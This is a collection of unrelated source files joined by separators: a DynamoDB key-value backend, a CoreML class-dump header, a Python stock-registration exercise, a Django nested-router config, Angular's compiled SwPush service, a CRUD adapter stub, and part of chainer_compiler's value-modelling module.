access_key_id=aws_access_key_id,
secret_access_key=aws_secret_access_key
)
def _get_client(self, access_key_id=None, secret_access_key=None):
"""Get client connection."""
if self._client is None:
client_parameters = {
'region_name': self.aws_region
}
if access_key_id is not None:
client_parameters.update({
'aws_access_key_id': access_key_id,
'aws_secret_access_key': secret_access_key
})
if self.endpoint_url is not None:
client_parameters['endpoint_url'] = self.endpoint_url
self._client = boto3.client(
'dynamodb',
**client_parameters
)
self._get_or_create_table()
return self._client
def _get_table_schema(self):
"""Get the boto3 structure describing the DynamoDB table schema."""
return {
'AttributeDefinitions': [
{
'AttributeName': self._key_field.name,
'AttributeType': self._key_field.data_type
}
],
'TableName': self.table_name,
'KeySchema': [
{
'AttributeName': self._key_field.name,
'KeyType': 'HASH'
}
],
'ProvisionedThroughput': {
'ReadCapacityUnits': self.read_capacity_units,
'WriteCapacityUnits': self.write_capacity_units
}
}
def _get_or_create_table(self):
"""Create table if not exists, otherwise return the description."""
table_schema = self._get_table_schema()
try:
table_description = self._client.create_table(**table_schema)
logger.info(
'DynamoDB Table {} did not exist, creating.'.format(
self.table_name
)
)
# In case we created the table, wait until it becomes available.
self._wait_for_table_status('ACTIVE')
logger.info(
'DynamoDB Table {} is now available.'.format(
self.table_name
)
)
return table_description
except ClientError as e:
error_code = e.response['Error'].get('Code', 'Unknown')
# If table exists, do not fail, just return the description.
if error_code == 'ResourceInUseException':
return self._client.describe_table(
TableName=self.table_name
)
else:
raise e
def _wait_for_table_status(self, expected='ACTIVE'):
"""Poll for the expected table status."""
achieved_state = False
while not achieved_state:
table_description = self.client.describe_table(
TableName=self.table_name
)
logger.debug(
'Waiting for DynamoDB table {} to become {}.'.format(
self.table_name,
expected
)
)
current_status = table_description['Table']['TableStatus']
achieved_state = current_status == expected
sleep(1)
def _prepare_get_request(self, key):
"""Construct the item retrieval request parameters."""
return {
'TableName': self.table_name,
'Key': {
self._key_field.name: {
self._key_field.data_type: key
}
}
}
def _prepare_put_request(self, key, value):
"""Construct the item creation request parameters."""
return {
'TableName': self.table_name,
'Item': {
self._key_field.name: {
self._key_field.data_type: key
},
self._value_field.name: {
self._value_field.data_type: value
},
self._timestamp_field.name: {
self._timestamp_field.data_type: str(time())
}
}
}
def _item_to_dict(self, raw_response):
"""Convert get_item() response to field-value pairs."""
if 'Item' not in raw_response:
return {}
return {
field.name: raw_response['Item'][field.name][field.data_type]
for field in self._available_fields
}
@property
def client(self):
return self._get_client()
def get(self, key):
key = string(key)
request_parameters = self._prepare_get_request(key)
item_response = self.client.get_item(**request_parameters)
item = self._item_to_dict(item_response)
return item.get(self._value_field.name)
def set(self, key, value):
key = string(key)
request_parameters = self._prepare_put_request(key, value)
self.client.put_item(**request_parameters)
def mget(self, keys):
return [self.get(key) for key in keys]
def delete(self, key):
key = string(key)
request_parameters = self._prepare_get_request(key)
self.client.delete_item(**request_parameters)
|
/*
* This header is generated by classdump-dyld 1.5
* on Friday, April 30, 2021 at 11:34:24 AM Mountain Standard Time
* Operating System: Version 13.5.1 (Build 17F80)
* Image Source: /System/Library/Frameworks/CoreML.framework/CoreML
* classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. Updated by Kevin Bradley.
*/
#import <libobjc.A.dylib/EspressoBrick.h>
@class NSArray, NSString;
@interface MLAddBroadcastableBrick : NSObject <EspressoBrick> {
BOOL _shapeInfoNeeded;
NSArray* _inputRanks;
NSArray* _outputRanks;
NSArray* _inputShapes;
NSArray* _outputShapes;
}
@property (nonatomic,readonly) BOOL shapeInfoNeeded; //@synthesize shapeInfoNeeded=_shapeInfoNeeded - In the implementation block
@property (nonatomic,readonly) NSArray * inputRanks; //@synthesize inputRanks=_inputRanks - In the implementation block
@property (nonatomic,readonly) NSArray * outputRanks; //@synthesize outputRanks=_outputRanks - In the implementation block
@property (nonatomic,readonly) NSArray * inputShapes; //@synthesize inputShapes=_inputShapes - In the implementation block
@property (nonatomic,readonly) NSArray * outputShapes; //@synthesize outputShapes=_outputShapes - In the implementation block
@property (readonly) unsigned long long hash;
@property (readonly) Class superclass;
@property (copy,readonly) NSString * description;
@property (copy,readonly) NSString * debugDescription;
-(id)initWithParameters:(id)arg1 ;
-(void)computeOnCPUWithInputTensors:(id)arg1 outputTensors:(id)arg2 ;
-(id)setupForInputShapes:(id)arg1 withParameters:(id)arg2 ;
-(BOOL)hasGPUSupport;
-(BOOL)shapeInfoNeeded;
-(NSArray *)inputRanks;
-(NSArray *)outputRanks;
-(NSArray *)inputShapes;
-(NSArray *)outputShapes;
@end
|
# Exercise 4
# importing itemgetter
from operator import itemgetter
dicionario = {}
lista = []
print('-' * 30)
print('Product Registration')
print('-' * 30)
while True:
    # Input: product code.
    codigo = int(input('Enter the product code (0 to exit): '))
    if codigo == 0:
        break
    # Input: quantity in stock.
    estoque = int(input('Enter the quantity in stock: '))
    # Input: minimum quantity.
    minimo = int(input('Enter the minimum quantity: '))
    # adding to the dictionary
    dicionario['codigo'] = codigo
    dicionario['estoque'] = estoque
    dicionario['minimo'] = minimo
    # copying the dictionary into the list.
    lista.append(dicionario.copy())
print('-' * 40)
# sorting the list.
listaordenada = sorted(lista, key=itemgetter('codigo'))
print('    Code     |    Stock    |   Minimum   ')
# printing the sorted list.
for p in listaordenada:
    print(str(p['codigo']).center(13), end='')
    print(str(p['estoque']).center(13), end='')
    print(str(p['minimo']).center(13))
print('-' * 40)
print('End.')
|
from django.urls import path, include
from rest_framework_nested import routers
from .views import EventViewSet, CommentViewSet, FeedViewSet
router = routers.SimpleRouter()
router.register('events', EventViewSet)
router.register('feed', FeedViewSet)
event_router = routers.NestedSimpleRouter(router, 'events', lookup='event')
event_router.register('comments', CommentViewSet, base_name='event-comments')
urlpatterns = [
path('', include(router.urls)),
path('', include(event_router.urls)),
]
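# A hedged sketch of the URL patterns these routers generate (route shapes follow
# the DRF / drf-nested-routers defaults and are assumptions, not taken from this file):
#   events/                          -> EventViewSet (list/create)
#   events/{pk}/                     -> EventViewSet (retrieve/update/destroy)
#   events/{event_pk}/comments/      -> CommentViewSet, nested under one event
#   events/{event_pk}/comments/{pk}/ -> CommentViewSet detail
#   feed/                            -> FeedViewSet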
|
/**
* @fileoverview added by tsickle
* @suppress {checkTypes,constantProperty,extraRequire,missingOverride,missingReturn,unusedPrivateMembers,uselessCode} checked by tsc
*/
/**
* @license
* Copyright Google Inc. All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import { Injectable } from '@angular/core';
import { NEVER, Subject, merge } from 'rxjs';
import { map, switchMap, take } from 'rxjs/operators';
import { ERR_SW_NOT_SUPPORTED, NgswCommChannel } from './low_level';
/**
* Subscribe and listen to push notifications from the Service Worker.
*
* \@publicApi
*/
import * as ɵngcc0 from '@angular/core';
export class SwPush {
/**
* @param {?} sw
*/
constructor(sw) {
this.sw = sw;
this.subscriptionChanges = new Subject();
if (!sw.isEnabled) {
this.messages = NEVER;
this.notificationClicks = NEVER;
this.subscription = NEVER;
return;
}
this.messages = this.sw.eventsOfType('PUSH').pipe(map((/**
* @param {?} message
* @return {?}
*/
message => message.data)));
this.notificationClicks =
this.sw.eventsOfType('NOTIFICATION_CLICK').pipe(map((/**
* @param {?} message
* @return {?}
*/
(message) => message.data)));
this.pushManager = this.sw.registration.pipe(map((/**
* @param {?} registration
* @return {?}
*/
registration => registration.pushManager)));
/** @type {?} */
const workerDrivenSubscriptions = this.pushManager.pipe(switchMap((/**
* @param {?} pm
* @return {?}
*/
pm => pm.getSubscription())));
this.subscription = merge(workerDrivenSubscriptions, this.subscriptionChanges);
}
/**
* True if the Service Worker is enabled (supported by the browser and enabled via
* `ServiceWorkerModule`).
* @return {?}
*/
get isEnabled() { return this.sw.isEnabled; }
/**
* @param {?} options
* @return {?}
*/
requestSubscription(options) {
if (!this.sw.isEnabled) {
return Promise.reject(new Error(ERR_SW_NOT_SUPPORTED));
}
/** @type {?} */
const pushOptions = { userVisibleOnly: true };
/** @type {?} */
let key = this.decodeBase64(options.serverPublicKey.replace(/_/g, '/').replace(/-/g, '+'));
/** @type {?} */
let applicationServerKey = new Uint8Array(new ArrayBuffer(key.length));
for (let i = 0; i < key.length; i++) {
applicationServerKey[i] = key.charCodeAt(i);
}
pushOptions.applicationServerKey = applicationServerKey;
return this.pushManager.pipe(switchMap((/**
* @param {?} pm
* @return {?}
*/
pm => pm.subscribe(pushOptions))), take(1))
.toPromise()
.then((/**
* @param {?} sub
* @return {?}
*/
sub => {
this.subscriptionChanges.next(sub);
return sub;
}));
}
/**
* @return {?}
*/
unsubscribe() {
if (!this.sw.isEnabled) {
return Promise.reject(new Error(ERR_SW_NOT_SUPPORTED));
}
/** @type {?} */
const doUnsubscribe = (/**
* @param {?} sub
* @return {?}
*/
(sub) => {
if (sub === null) {
throw new Error('Not subscribed to push notifications.');
}
return sub.unsubscribe().then((/**
* @param {?} success
* @return {?}
*/
success => {
if (!success) {
throw new Error('Unsubscribe failed!');
}
this.subscriptionChanges.next(null);
}));
});
return this.subscription.pipe(take(1), switchMap(doUnsubscribe)).toPromise();
}
/**
* @private
* @param {?} input
* @return {?}
*/
decodeBase64(input) { return atob(input); }
}
SwPush.ngInjectableDef = ɵngcc0.ɵɵdefineInjectable({ token: SwPush, factory: function SwPush_Factory(t) { return new (t || SwPush)(ɵngcc0.ɵɵinject(NgswCommChannel)); }, providedIn: null });
/*@__PURE__*/ ɵngcc0.ɵsetClassMetadata(SwPush, [{
type: Injectable
}], function () { return [{ type: NgswCommChannel }]; }, { constructor: [], sw: [], subscriptionChanges: [], messages: [], notificationClicks: [], subscription: [], pushManager: [], isEnabled: [], requestSubscription: [], unsubscribe: [], decodeBase64: [] });
/** @nocollapse */
SwPush.ctorParameters = () => [
{ type: NgswCommChannel }
];
if (false) {
/**
* Emits the payloads of the received push notification messages.
* @type {?}
*/
SwPush.prototype.messages;
/**
* Emits the payloads of the received push notification messages as well as the action the user
* interacted with. If no action was used the action property will be an empty string `''`.
*
* Note that the `notification` property is **not** a [Notification][Mozilla Notification] object
* but rather a
* [NotificationOptions](https://notifications.spec.whatwg.org/#dictdef-notificationoptions)
* object that also includes the `title` of the [Notification][Mozilla Notification] object.
*
* [Mozilla Notification]: https://developer.mozilla.org/en-US/docs/Web/API/Notification
* @type {?}
*/
SwPush.prototype.notificationClicks;
/**
* Emits the currently active
* [PushSubscription](https://developer.mozilla.org/en-US/docs/Web/API/PushSubscription)
* associated to the Service Worker registration or `null` if there is no subscription.
* @type {?}
*/
SwPush.prototype.subscription;
/**
* @type {?}
* @private
*/
SwPush.prototype.pushManager;
/**
* @type {?}
* @private
*/
SwPush.prototype.subscriptionChanges;
/**
* @type {?}
* @private
*/
SwPush.prototype.sw;
}
|
/**
* rudiment - CRUD resource manager
* https://github.com/gavinhungry/rudiment
*/
(function() {
'use strict';
module.exports = {
id: '_id',
api: {
init: function() {
var dbCursorProto = Object.getPrototypeOf(this._db.find());
dbCursorProto.toArray = dbCursorProto.toArray || dbCursorProto.exec;
},
getNextIndex: function() {
// resolve with number
},
isAdmissible: function(doc, props) {
// resolve with boolean
},
create: function(doc) {
// resolve with created document
},
find: function(props) {
// resolve with matching document(s)
},
read: function(id) {
// resolve with matching document
},
update: function(id, doc) {
// resolve with updated document
},
delete: function(id) {
// resolve with boolean
}
}
};
})();
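// Hedged sketch (hypothetical, not part of rudiment): a concrete adapter built on
// this template might implement `read` against the injected `this._db` handle
// roughly like the following, relying on the `toArray` shim set up in `init`:
//   read: function(id) {
//     // resolve with the matching document, or null when nothing matches
//     return this._db.find({ _id: id }).toArray().then(function(docs) {
//       return docs[0] || null;
//     });
//   }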
|
import chainer
import chainer.functions as F
import chainer.links as L
import sys
import numpy as np
import collections
import ast
import gast
import inspect
import six
import types
import weakref
from chainer_compiler.elichika.parser import vevaluator
from chainer_compiler.elichika.parser import core
from chainer_compiler.elichika.parser import nodes
from chainer_compiler.elichika.parser import functions
from chainer_compiler.elichika.parser import utils
from chainer_compiler.elichika.parser import config
from chainer_compiler.elichika.parser import flags
from chainer_compiler.elichika.parser.functions import FunctionBase, UserDefinedFunction
fields = []
histories = []
# hashable function. key is python function, value is FuncValue
function_converters = {}
# unhashable function. key is str, value is FuncValue
builtin_function_converters = {}
# an array of converters from a python instance into a Value
# first argument is module, second argument is python instance
instance_converters = []
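# Hedged sketch (hypothetical, not part of this module): a converter receives
# (default_module, instance) and returns a Value, or None to decline, so a
# converter for Python sets could look like:
#     def _convert_set(default_module, instance):
#         if not isinstance(instance, set):
#             return None
#         return ListValue([parse_instance(default_module, '', v) for v in instance])
#     instance_converters.append(_convert_set)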
# assign predefined values
predefined_value_assigners = [] # type: List[PredefinedValueAssigner]
class PredefinedValueAssigner:
def __init__(self):
self.target_type = None # type: type
def assign(self, target : 'Object'):
return
def apply_predefined_value_assigners(target_type : 'type', target : 'Object'):
for assigner in predefined_value_assigners:
if assigner.target_type != target_type:
continue
assigner.assign(target)
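# Hedged sketch (hypothetical): an assigner targets one Value type and attaches
# predefined attributes to every Object of that type. Call sites in this module
# pass `type(ListValue)` / `type(TensorValue)` as the target type, so a matching
# assigner would set `self.target_type` the same way.
#     class _NdimAssigner(PredefinedValueAssigner):
#         def __init__(self):
#             super().__init__()
#             self.target_type = type(TensorValue)
#         def assign(self, target: 'Object'):
#             target.get_field().get_attribute('ndim').revise(Object(NumberValue(None)))
#     predefined_value_assigners.append(_NdimAssigner())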
def create_ref_value_name_with_constant(value):
if isinstance(value, Object):
value = value.get_value()
if value.has_constant_value():
return '@C_' + str(value.get_constant_value())
return '@C_Unknown'
def reset_field_and_attributes():
global fields
fields = []
histories.clear()
def register_field(field: 'Field'):
fields.append(weakref.ref(field))
def unregister_field(field: 'Field'):
global fields
fields = [f for f in fields if f() != field]
def push_history(history_id: 'str'):
histories.append(history_id)
for field in fields:
o = field()
if o is not None:
o.push_history(history_id)
def pop_history():
histories.pop()
for field in fields:
o = field()
if o is not None:
o.pop_history()
def get_inputs() -> 'List[FieldInput]':
ret = []
for field in fields:
o = field()
if o is not None:
ret += o.get_inputs()
return ret
def get_outputs() -> 'List[FieldOutput]':
ret = []
for field in fields:
o = field()
if o is not None:
ret += o.get_outputs()
return ret
def compare(value1, value2):
if type(value1) != type(value2):
return False
else:
        if isinstance(value1, NumberValue):
            return value1.internal_value == value2.internal_value and value1.internal_value is not None
        elif isinstance(value1, StrValue):
            return value1.internal_value == value2.internal_value and value1.internal_value is not None
        else:
            return False
def parse_instance(default_module, name, instance, self_instance=None, from_member = False, root_graph : 'graphs.Graph' = None) -> "Object":
for converter in instance_converters:
ret = converter(default_module, instance)
if ret is not None:
return Object(ret)
#if inspect.ismethod(instance) or inspect.isfunction(instance) or isinstance(instance, np.ufunc):
if isinstance(instance, collections.Hashable):
if instance in function_converters.keys():
func = function_converters[instance]
return Object(func)
    # bool must be checked before int because bool is a subclass of int
if isinstance(instance, bool):
return Object(BoolValue(instance))
if isinstance(instance, int):
return Object(NumberValue(instance))
if isinstance(instance, np.int32):
return Object(NumberValue(instance))
if isinstance(instance, np.int64):
return Object(NumberValue(instance))
if isinstance(instance, float):
return Object(NumberValue(instance))
if isinstance(instance, np.float32):
return Object(NumberValue(instance))
if isinstance(instance, np.float64):
return Object(NumberValue(instance))
if isinstance(instance, str):
return Object(StrValue(instance))
if instance is inspect._empty:
return None
if inspect.ismethod(instance):
func = UserDefinedFunction(instance)
return Object(FuncValue(func, self_instance, default_module))
if inspect.isfunction(instance):
func = UserDefinedFunction(instance)
if from_member:
return Object(FuncValue(func, self_instance, default_module))
else:
return Object(FuncValue(func, None, default_module))
if inspect.isclass(instance):
func = functions.UserDefinedClassConstructorFunction(instance)
return Object(FuncValue(func, None, default_module))
if isinstance(instance, list):
if root_graph is None:
value_in_tuple = []
for v in instance:
o = parse_instance(default_module, '', v)
value_in_tuple.append(o)
ret = ListValue(value_in_tuple)
else:
value_in_tuple = []
vs = []
for v in instance:
o = parse_instance(default_module, '', v)
value_in_tuple.append(o)
value = o.get_value()
if isinstance(value, TupleValue):
assert(False)
if isinstance(value, ListValue):
assert(False)
vs.append(value)
node = nodes.NodeGenerate('List', vs)
ret = ListValue(value_in_tuple)
node.set_outputs([ret])
root_graph.add_initial_node(node)
ret.estimate_type()
return Object(ret)
if isinstance(instance, dict):
keys = []
values = []
for key, value in instance.items():
keys.append(parse_instance(default_module, '', key))
values.append(parse_instance(default_module, '', value))
ret = DictValue(keys, values)
return Object(ret)
    if isinstance(instance, tuple) and 'Undefined' in instance:
        # replace each 'Undefined' entry with -1 to mark an unknown dimension
        shape = [-1 if s == 'Undefined' else s for s in instance]
        tensorValue = TensorValue()
        tensorValue.shape = tuple(shape)
        return Object(tensorValue)
if isinstance(instance, tuple):
if root_graph is None:
value_in_tuple = []
for v in instance:
o = parse_instance(default_module, '', v)
value_in_tuple.append(o)
return Object(TupleValue(value_in_tuple))
else:
value_in_tuple = []
vs = []
for v in instance:
o = parse_instance(default_module, '', v)
value_in_tuple.append(o)
value = o.get_value()
if isinstance(value, TupleValue):
assert(False)
if isinstance(value, ListValue):
assert(False)
vs.append(value)
node = nodes.NodeGenerate('Tuple', vs)
ret = TupleValue(value_in_tuple)
node.set_outputs([ret])
root_graph.add_initial_node(node)
return Object(ret)
if isinstance(instance, np.ndarray):
tensorValue = TensorValue(instance)
tensorValue.value = instance
tensorValue.shape = instance.shape
return Object(tensorValue)
if isinstance(instance, chainer.Variable):
tensorValue = TensorValue(instance.data)
tensorValue.value = instance.data
tensorValue.shape = instance.data.shape
return Object(tensorValue)
if instance == inspect._empty:
return Object(NoneValue())
if instance is None:
return Object(NoneValue())
if utils.is_disabled_module(instance):
return None
if inspect.ismodule(instance):
value = ModuleValue(instance)
return Object(value)
module = Object(ModuleValue(sys.modules[instance.__module__]))
model_inst = UserDefinedInstance(module, instance, None)
return Object(model_inst)
class FieldInput:
def __init__(self):
self.input_value = None
self.field = None
self.name = None
self.value = None
self.obj = None
class FieldOutput:
def __init__(self):
self.field = None
self.name = None
self.obj = None
self.old_value = None
self.value = None
class FieldAttributeCollection():
def __init__(self, id: 'str', parent: 'FieldAttributeCollection'):
self.id = id
self.parent = parent
self.attributes = {}
self.inputs = {}
def try_get_attribute(self, key: 'str'):
if key in self.attributes.keys():
return self.attributes[key]
# search from parent
if self.parent is None:
return None
parent_attribute = self.parent.try_get_attribute(key)
if parent_attribute is None:
return None
attribute = Attribute(key)
attribute.parent = parent_attribute.parent
# instance or func
if isinstance(parent_attribute.get_obj().get_value(), Instance) or isinstance(parent_attribute.get_obj().get_value(), FuncValue) or isinstance(parent_attribute.get_obj().get_value(), ModuleValue):
attribute.revise(parent_attribute.get_obj())
self.attributes[key] = attribute
return attribute
# input
attribute.revise(parent_attribute.get_obj())
self.attributes[key] = attribute
self.inputs[attribute] = (attribute.get_obj(), attribute.get_obj().get_value(
), attribute.get_obj().get_value(), attribute.get_obj().get_value())
return attribute
def pop_history(self):
for att, input in self.inputs.items():
input[0].revise(input[1])
self.inputs.clear()
def get_inputs(self) -> 'List[FieldInput]':
'''
return [(input value, copied input value)]
'''
ret = []
for att, input in self.inputs.items():
fi = FieldInput()
fi.name = att.name
fi.field = att.parent
fi.input_value = input[2]
fi.value = input[3]
fi.obj = input[0]
ret.append(fi)
return ret
def get_outputs(self) -> 'List[FieldOutput]':
'''
return [(field,key,value)]
'''
ret = []
for key, att in self.attributes.items():
            # skip attributes without an object (a missing object usually ends up as a compile error)
if not att.has_obj():
continue
# instance or func
if isinstance(att.get_obj().get_value(), Instance) or isinstance(att.get_obj().get_value(), FuncValue) or isinstance(att.get_obj().get_value(), ModuleValue):
continue
if (not (att in self.inputs.keys())) or att.get_obj() != self.inputs[att][0] or att.get_obj().get_value() != self.inputs[att][1]:
fo = FieldOutput()
fo.name = att.name
fo.field = att.parent
fo.obj = att.get_obj()
if att in self.inputs.keys():
fo.old_value = self.inputs[att][1]
fo.value = att.get_obj().get_value()
ret.append(fo)
return ret
class Field():
def __init__(self):
self.collection = FieldAttributeCollection('', None)
histories_ = histories.copy()
histories_.reverse()
for history in histories_:
collection = FieldAttributeCollection(history, self.collection)
self.collection = collection
self.module = None
self.id = utils.get_guid()
register_field(self)
def dispose(self):
        '''
        Dispose of this field when leaving a function scope.
        The field must not be used after disposal.
        '''
self.collection = FieldAttributeCollection('', None)
unregister_field(self)
def set_module(self, module):
self.module = module
def get_field(self) -> 'Field':
return self
    def has_attribute(self, key) -> 'bool':
c = self.collection
while c is not None:
if key in c.attributes.keys():
return True
c = c.parent
return False
def try_get_attribute(self, key : 'str') -> 'Attribute':
return self.collection.try_get_attribute(key)
def get_attribute(self, key: 'str', root_graph : 'graphs.Graph' = None, from_module=False) -> 'Attribute':
attribute = self.collection.try_get_attribute(key)
if attribute is not None:
return attribute
# search an attribute from a module
if self.module is not None and from_module and self.module.try_get_and_store_obj(key, root_graph):
attribute = self.module.attributes.get_attribute(key, root_graph)
if attribute is not None:
return attribute
attribute = Attribute(key)
attribute.parent = self
self.collection.attributes[key] = attribute
return attribute
def push_history(self, history_id: 'str'):
collection = FieldAttributeCollection(history_id, self.collection)
self.collection = collection
def pop_history(self):
self.collection.pop_history()
self.collection = self.collection.parent
if self.collection is None:
self.collection = FieldAttributeCollection('', None)
def get_inputs(self):
return self.collection.get_inputs()
def get_outputs(self):
return self.collection.get_outputs()
def set_predefined_obj(self, key, obj):
collections = []
c = self.collection
while True:
collections.append(c)
c = c.parent
if c is None:
break
collections.reverse()
old_value = None
value = None
for collection in collections:
attribute = Attribute(key)
attribute.parent = self
attribute.revise(obj)
collection.attributes[key] = attribute
if isinstance(obj.get_value(), Instance) or isinstance(obj.get_value(), FuncValue) or isinstance(obj.get_value(), ModuleValue):
continue
collection.inputs[attribute] = (attribute.get_obj(), attribute.get_obj(
).get_value(), attribute.get_obj().get_value(), attribute.get_obj().get_value())
# if old_value is not None:
# collection.inputs[attribute] = (attribute.get_obj(), attribute.get_obj().get_value(), old_value, value)
#old_value = obj.get_value()
#value = functions.generate_copied_value(old_value)
#obj = Object(value)
class Attribute:
def __init__(self, name: 'str'):
self.name = name
self.obj = None
self.parent = None # type: Field
# if it is non-volatile, an object in this attribute is saved after running
self.is_non_volatile = False
def revise(self, obj: 'Object'):
assert(isinstance(obj, Object))
        # assign a name to the object
obj.name = utils.create_obj_value_name_with_attribute(
self.name, obj.name)
obj.get_value().name = utils.create_obj_value_name_with_attribute(
self.name, obj.get_value().name)
self.obj = obj
def has_obj(self):
        return self.obj is not None
def get_obj(self):
assert self.has_obj()
return self.obj
def make_subscript_attribute(self, subscript: 'Object', graph: 'Graph'):
return SubscriptAttribute(self.name+"subscript"+str(utils.get_guid()), self, subscript, graph)
def __str__(self):
return self.name
class SubscriptAttribute(Attribute):
def __init__(self, name: 'str', parent: 'Attribute', subscript: 'Object', graph: 'Graph'):
super().__init__(name)
self.attribute_parent = parent
self.subscript = subscript
self.graph = graph
def revise(self, obj: 'Object', update_parent = True):
super().revise(obj)
if not update_parent:
return
assert isinstance(self.attribute_parent, Attribute)
target_value = utils.try_get_value(self.attribute_parent, 'subscript', -1)
revision_value = utils.try_get_value(self.obj, 'subscript', -1)
subscript_value = utils.try_get_value(self.subscript, 'subscript', -1)
if isinstance(subscript_value, TupleValue):
# ex. x[1,2]
if subscript_value.has_constant_value():
subscripts = [utils.try_get_value(x, 'subscript', -1) for x in subscript_value.get_constant_value()]
else:
if config.show_warnings:
assert False, "This subscript is not supported."
else:
# ex. x[1]
subscripts = [subscript_value]
node = nodes.NodeSetItem(target_value, subscripts, revision_value)
ret_value = functions.generate_value_with_same_type(target_value)
node.set_outputs([ret_value])
self.graph.add_node(node)
self.attribute_parent.revise(Object(ret_value))
class Object():
def __init__(self, value: 'Value'):
self.name = ""
self.value = value
self.id = utils.get_guid()
self.attributes = Field()
self.value.apply_to_object(self)
self.in_container = False
def get_field(self) -> 'Field':
return self.attributes
def get_value(self) -> 'Value':
return self.value
def revise(self, value):
self.value = value
def try_get_and_store_obj(self, name: 'str', root_graph : 'graphs.Graph') -> 'Object':
attribute = self.attributes.try_get_attribute(name)
if attribute is not None and attribute.has_obj():
return attribute.get_obj()
obj = self.value.try_get_obj(name, self, root_graph)
if obj is None:
return None
self.attributes.set_predefined_obj(name, obj)
return obj
class Value():
def __init__(self):
self.name = ""
self.generator = None
self.internal_value = None
self.dtype = None
self.id = utils.get_guid()
        # the actual value is not important; only the type matters when this is used as a dummy value
self.is_dummy_value = False
def has_constant_value(self) -> 'bool':
return self.internal_value is not None
def get_constant_value(self):
return self.internal_value
def is_not_none_or_any_value(self):
return False
def is_iteratable(self):
return False
def is_hashable(self):
return False
def get_iterator(self) -> 'Object':
return None
def apply_to_object(self, obj: 'Object'):
'''
register functions to an object
this function is only called when an object is generated
'''
return None
def encode(self):
if not self.is_hashable():
assert(False)
return ""
def try_get_obj(self, name: 'str', inst: 'Object', root_graph : 'graphs.Graph') -> 'Object':
return None
def __str__(self):
return self.name
class NoneValue(Value):
def __init__(self):
super().__init__()
def has_constant_value(self) -> 'bool':
return True
def is_hashable(self):
return True
def encode(self):
ret = super().encode()
ret += 'None'
ret += str(hash(None))
return ret
def get_constant_value(self):
return None
def __str__(self):
return self.name + '({})'.format('None')
class UnknownValue(Value):
def __init__(self):
super().__init__()
def __str__(self):
return self.name + '(Un)'
class NumberValue(Value):
def __init__(self, number):
super().__init__()
self.internal_value = number
self.dtype = None
if self.internal_value is not None:
self.dtype = np.array(self.internal_value).dtype
if not config.float_restrict and self.dtype == np.float64:
self.dtype = np.float32
def is_not_none_or_any_value(self):
return True
def is_hashable(self):
return self.has_constant_value()
def encode(self):
ret = super().encode()
ret += 'Num'
ret += str(hash(self.internal_value))
return ret
def __str__(self):
        if self.internal_value is None:
return self.name + '(N.{})'.format('Any')
return self.name + '(N.{})'.format(self.internal_value)
class StrValue(Value):
def __init__(self, string):
super().__init__()
self.internal_value = string
def is_not_none_or_any_value(self):
return True
def is_hashable(self):
return self.has_constant_value()
def encode(self):
ret = super().encode()
ret += 'Str'
ret += str(hash(self.internal_value))
return ret
def __str__(self):
        if self.internal_value is None:
return self.name + '(S.{})'.format('Any')
return self.name + '(S.{})'.format(self.internal_value)
class BoolValue(Value):
def __init__(self, b):
super().__init__()
self.internal_value = b
def is_not_none_or_any_value(self):
return True
def is_hashable(self):
return self.has_constant_value()
def encode(self):
ret = super().encode()
ret += 'Num'
ret += str(hash(self.internal_value))
return ret
def __str__(self):
        if self.internal_value is None:
return self.name + '(B.{})'.format('Any')
return self.name + '(B.{})'.format(self.internal_value)
class RangeValue(Value):
def __init__(self):
super().__init__()
def is_not_none_or_any_value(self):
return True
def is_iteratable(self):
return True
def get_iterator(self) -> 'Object':
return Object(NumberValue(None))
def __str__(self):
return self.name + '(R)'
class TupleValue(Value):
def __init__(self, values=None):
super().__init__()
self.internal_value = values
self.vtype = None # type: Type
def is_not_none_or_any_value(self):
return True
def is_iteratable(self):
return True
def is_hashable(self):
self.estimate_type()
return self.has_constant_value() and self.vtype is not None
def encode(self):
ret = super().encode()
ret += 'Tuple'
tup = tuple(v.get_value().internal_value for v in self.internal_value)
ret += str(hash(tup))
return ret
def get_iterator(self) -> 'Object':
if self.vtype is None:
return None
v = self.vtype()
if self.dtype is not None:
v.dtype = self.dtype
return Object(v)
def estimate_type(self):
if self.internal_value is None:
return
self.vtype = None
self.dtype = None
for v in self.internal_value:
if self.vtype is None:
self.vtype = type(v.get_value())
self.dtype = v.get_value().dtype
else:
if self.vtype != type(v.get_value()):
self.vtype = None
self.dtype = None
return
if self.dtype != v.get_value().dtype:
self.dtype = None
def __str__(self):
return self.name + '(Tp{})'
class FuncValue(Value):
def __init__(self, func: 'functions.FunctionBase', obj: 'Object', module : 'Object' = None):
super().__init__()
self.func = func
        self.internal_value = func  # TODO(rchours): So that has_constant_value() succeeds on FuncValue.
self.obj = obj
self.module = module
def is_not_none_or_any_value(self):
return True
def __str__(self):
return self.name + '(F)'
class ListValue(Value):
def __init__(self, values=None):
super().__init__()
self.internal_value = values
self.dtype = None
self.vtype = None # type: Type
def is_not_none_or_any_value(self):
return True
def is_iteratable(self):
return True
def get_iterator(self) -> 'Object':
if self.vtype is None:
return None
v = self.vtype()
if self.dtype is not None:
v.dtype = self.dtype
return Object(v)
def __filter_internal_values(self):
return [v for v in self.internal_value if v is not None and not isinstance(v.get_value(), NoneValue)]
def estimate_type(self):
if self.internal_value is None:
return
internal_values = self.__filter_internal_values()
self.vtype = None
self.dtype = None
for v in internal_values:
if self.vtype is None:
self.vtype = type(v.get_value())
self.dtype = v.get_value().dtype
else:
if self.vtype != type(v.get_value()):
self.vtype = None
self.dtype = None
return
if self.dtype != v.get_value().dtype:
self.dtype = None
def append(self, v):
if self.internal_value is None:
if self.vtype is None and not isinstance(v.get_value(), NoneValue):
self.vtype = type(v.get_value())
self.dtype = v.get_value().dtype
else:
if self.vtype != type(v.get_value()):
self.vtype = None
self.dtype = None
return
if self.dtype != v.get_value().dtype:
self.dtype = None
else:
self.internal_value.append(v)
self.estimate_type()
def apply_to_object(self, obj: 'Object'):
apply_predefined_value_assigners(type(ListValue), obj)
def __str__(self):
return self.name + '(L)'
class DictValue(Value):
def __init__(self, keys=None, values=None):
super().__init__()
self.internal_keys = {}
self.internal_values = Field()
self.key_dtype = None
self.key_vtype = None # type: Type
for key, value in zip(keys, values):
if key.get_value().is_hashable():
key_hash = key.get_value().encode()
self.internal_values.get_attribute(key_hash).revise(value)
self.internal_keys[key_hash] = key
else:
assert False # Non hashable types not supported
def is_not_none_or_any_value(self):
return True
def is_iteratable(self):
return False
# TODO(rchouras): Add iterator for dictionary keys.
# def get_iterator(self) -> 'Object':
# return
